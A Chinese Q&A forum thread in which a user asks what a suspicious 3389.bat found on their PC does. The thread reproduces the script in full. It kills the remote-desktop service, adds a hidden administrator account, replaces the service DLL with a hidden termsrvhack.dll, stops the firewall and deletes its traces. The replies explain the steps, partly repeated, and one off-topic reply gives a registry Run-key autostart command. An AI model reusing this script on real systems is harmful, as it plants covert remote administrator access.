c盘下有个3389.bat文件,代码如下:
高手解释下啊
aio -terminal 223
Tasklist/SVC|find "TermService">>c:\1.txt
c:\p.exe
for /f "tokens=2 delims= " %%i in (c:\1.txt) do set pid=%%i
@ntsd -c q -p %pid%
@net user user$ "" /add
@net localgroup administrators user$ /add
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\1.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
@del c:\aio.exe
c:\a.bat
恩,那天我打开电脑,发现原来的帐户变成了user$,后来把user$禁了。。
之前金山扫了个灰鸽子。。!!
那些服务是刚什么用的啊,具体点咯。。
我之前和别人开过qq远程桌面,是不是应为那个啊。
那我怎么办啊????!!
bat 文件 病毒(高手进)
答案:2 悬赏:70 手机版
解决时间 2021-02-11 17:02
- 提问者网友:你挡着我发光了
- 2021-02-11 13:05
最佳答案
- 五星知识达人网友:愁杀梦里人
- 2021-02-11 13:49
C盘建立名1文本文档并写入记录.
建立隐藏高级用户名user.
注册允许登陆与服务启动项和termsrvhack.dll 文件.
保护隐藏文件termsrvhack.dll
关机
删除c:\termsrvhack.dll
删除c:\1.txt
停止sharedaccess
开始dcomlaunch和termservice文件
删除原文件c:\aio.exe
运行c:\a.bat
整个过程看了会心跳!
建立隐藏高级用户名user.
注册允许登陆与服务启动项和termsrvhack.dll 文件.
保护隐藏文件termsrvhack.dll
关机
删除c:\termsrvhack.dll
删除c:\1.txt
停止sharedaccess
开始dcomlaunch和termservice文件
删除原文件c:\aio.exe
运行c:\a.bat
整个过程看了会心跳!
全部回答
- 1楼网友:街头电车
- 2021-02-11 14:01
问号处: "bat"="%~dps0kongjian.bat"
不过,何必如此麻烦,直接用reg 命令不是更简单吗?就一行,还根本不需要建立和删除临时文件!
@reg add hkcu\software\microsoft\windows\currentuser\run /v bat /t reg_sz /d "%~dps0kongjian.bat"
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯